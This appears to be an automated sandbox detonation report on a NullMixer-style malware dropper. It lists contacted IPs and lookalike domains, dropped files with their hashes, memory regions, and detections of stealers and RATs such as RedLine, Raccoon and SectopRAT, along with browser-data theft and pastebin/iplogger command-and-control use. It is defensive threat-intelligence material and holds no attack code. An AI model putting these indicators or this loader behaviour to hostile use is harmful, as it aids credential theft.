| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
| MD5 | 3fce5aacf6f9eb4b34126d0c2a9d36c2 |
| SHA1 | 5590c4402fcda16fe873f857088b4ee6c38858b1 |
| SHA256 | ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12 |
| SHA512 | ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7 |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2600-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2600-70-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2600-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/840-71-0x000000007371E000-0x000000007371F000-memory.dmp
memory/2600-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/840-85-0x0000000005210000-0x0000000005246000-memory.dmp
memory/840-86-0x0000000073710000-0x0000000073EC0000-memory.dmp
memory/3664-87-0x0000000005A50000-0x0000000006078000-memory.dmp
memory/840-89-0x0000000073710000-0x0000000073EC0000-memory.dmp
memory/3664-91-0x0000000073710000-0x0000000073EC0000-memory.dmp
memory/1836-92-0x0000000000940000-0x0000000000948000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
| MD5 | 3bf8a169c55f8b54700880baee9099d7 |
| SHA1 | d411f875744aa2cfba6d239bad723cbff4cf771a |
| SHA256 | 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2 |
| SHA512 | f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11 |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
memory/3664-120-0x00000000061D0000-0x0000000006524000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe
| MD5 | d165e339ef0c057e20eb61347d06d396 |
| SHA1 | cb508e60292616b22f2d7a5ab8f763e4c89cf448 |
| SHA256 | ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8 |
| SHA512 | da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580 |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/4184-137-0x0000000000650000-0x00000000006C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-9P55F.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/5104-136-0x0000000004DF0000-0x0000000004DF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/980-148-0x0000000005910000-0x0000000005EB4000-memory.dmp
memory/3256-153-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4452-156-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/964-158-0x0000000000400000-0x0000000000414000-memory.dmp
memory/980-134-0x0000000005020000-0x000000000503E000-memory.dmp
memory/1104-121-0x00000000004F0000-0x0000000000560000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe
| MD5 | e90750ecf7d4add59391926ccfc15f51 |
| SHA1 | 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1 |
| SHA256 | b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59 |
| SHA512 | 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hehtl4dv.k4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3664-106-0x00000000060F0000-0x0000000006156000-memory.dmp
memory/980-105-0x0000000005040000-0x00000000050B6000-memory.dmp
memory/980-103-0x0000000000900000-0x0000000000972000-memory.dmp
memory/3664-107-0x0000000006160000-0x00000000061C6000-memory.dmp
memory/5104-104-0x0000000000530000-0x0000000000546000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
| MD5 | 6b4f4e37bc557393a93d254fe4626bf3 |
| SHA1 | b9950d0223789ae109b43308fcaf93cd35923edb |
| SHA256 | 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d |
| SHA512 | a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e |
memory/3664-102-0x0000000005A10000-0x0000000005A32000-memory.dmp
memory/3664-161-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/964-96-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-V9RJ3.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/3664-171-0x0000000006850000-0x000000000689C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/3664-84-0x0000000073710000-0x0000000073EC0000-memory.dmp
memory/2600-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2600-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2600-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2600-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2600-63-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2600-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2600-60-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2600-59-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2600-58-0x00000000007B0000-0x000000000083F000-memory.dmp
memory/2600-57-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2600-52-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2600-182-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2600-181-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3152-172-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/2600-180-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2600-173-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2600-179-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2600-178-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3664-188-0x0000000007730000-0x0000000007762000-memory.dmp
memory/3664-201-0x0000000007820000-0x00000000078C3000-memory.dmp
memory/840-214-0x0000000007AC0000-0x0000000007ADA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed09e3a07534aa.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4180-223-0x0000000005640000-0x000000000567C000-memory.dmp
memory/3664-224-0x0000000007D30000-0x0000000007DC6000-memory.dmp
memory/4180-222-0x0000000005710000-0x000000000581A000-memory.dmp
memory/3664-225-0x0000000007CC0000-0x0000000007CD1000-memory.dmp
memory/840-238-0x0000000007CF0000-0x0000000007CFE000-memory.dmp
memory/4180-221-0x00000000055E0000-0x00000000055F2000-memory.dmp
memory/3664-239-0x0000000007D00000-0x0000000007D14000-memory.dmp
memory/3664-240-0x0000000007DF0000-0x0000000007E0A000-memory.dmp
memory/840-247-0x0000000073710000-0x0000000073EC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I
| MD5 | b1c69eec40db9d006f8b4df8ac3c038e |
| SHA1 | 4fc32d07029329e1e6c374b6af8d1925b1f64546 |
| SHA256 | 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5 |
| SHA512 | e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L
| MD5 | e99d5f78660e8ea9d09045c7f1cba42c |
| SHA1 | 43ab1072c97572f4e8caefdcbe2d5aa211fd3087 |
| SHA256 | 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98 |
| SHA512 | 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~
| MD5 | 6acc22b9c1abe535c6feac6a79db1a18 |
| SHA1 | eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9 |
| SHA256 | e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef |
| SHA512 | f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf |
memory/2112-261-0x0000000003060000-0x00000000031BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_ENU.W
| MD5 | 13d4be61d9d3c7da927d482b449ff09e |
| SHA1 | 57fab8c699c46ff55b74794027201210c001dd0b |
| SHA256 | 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324 |
| SHA512 | ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt
| MD5 | 36fb32e67fa42636817aca7805b49800 |
| SHA1 | ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164 |
| SHA256 | b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56 |
| SHA512 | 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x
| MD5 | 6ba17599a0544b52b5ea5ae9d261658f |
| SHA1 | 73637edb407d1a8cb80836b19602611cc71dcdf7 |
| SHA256 | 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168 |
| SHA512 | 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o
| MD5 | a6b49368224db5ac48fea0e7215b39d9 |
| SHA1 | 7385c9cae70f58842c8337ddb038641515e71313 |
| SHA256 | fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262 |
| SHA512 | 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/3664-248-0x0000000073710000-0x0000000073EC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fe147adf3e5ed555b843fff0fa29ab8a |
| SHA1 | 1cdf42b7f835e19466b52b981e6677804895b99b |
| SHA256 | 8cd6fb1b1716316a8a0b3312e3e997eddfb0d15b2b71b57ca88ba26e95b9ce88 |
| SHA512 | d17a0ab8abdaf1f22a0e16114f621473d9a46734cc01d13778b9ba7df2bf620ddffacef2ee3f1cdfc9c9a63558937248dacd03e42acffab9f53f7064022a04f7 |
memory/3664-241-0x0000000007DE0000-0x0000000007DE8000-memory.dmp
memory/4180-220-0x0000000005B00000-0x0000000006118000-memory.dmp
memory/3664-219-0x0000000007B40000-0x0000000007B4A000-memory.dmp
memory/4180-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/840-213-0x0000000008100000-0x000000000877A000-memory.dmp
memory/840-200-0x000000006D130000-0x000000006D17C000-memory.dmp
memory/3664-199-0x00000000076F0000-0x000000000770E000-memory.dmp
memory/3664-189-0x000000006D130000-0x000000006D17C000-memory.dmp
memory/2112-262-0x00000000035C0000-0x0000000003666000-memory.dmp
memory/2112-264-0x0000000003670000-0x0000000003703000-memory.dmp
memory/2112-266-0x0000000003670000-0x0000000003703000-memory.dmp
memory/2112-263-0x0000000003670000-0x0000000003703000-memory.dmp
memory/3196-269-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-272-0x0000000000400000-0x0000000000422000-memory.dmp
memory/184-274-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3256-273-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2112-275-0x0000000003060000-0x00000000031BD000-memory.dmp
memory/2112-284-0x0000000003670000-0x0000000003703000-memory.dmp
memory/2112-285-0x0000000003710000-0x00000000044BC000-memory.dmp
memory/2112-286-0x00000000044C0000-0x000000000454C000-memory.dmp
memory/2112-290-0x0000000004550000-0x00000000045D8000-memory.dmp
memory/2112-287-0x0000000004550000-0x00000000045D8000-memory.dmp
memory/2112-291-0x0000000001020000-0x0000000001021000-memory.dmp
memory/2112-292-0x0000000001030000-0x0000000001034000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240708-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2392 set thread context of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe |
| PID 2212 set thread context of 304 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe |
| PID 1376 set thread context of 2296 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
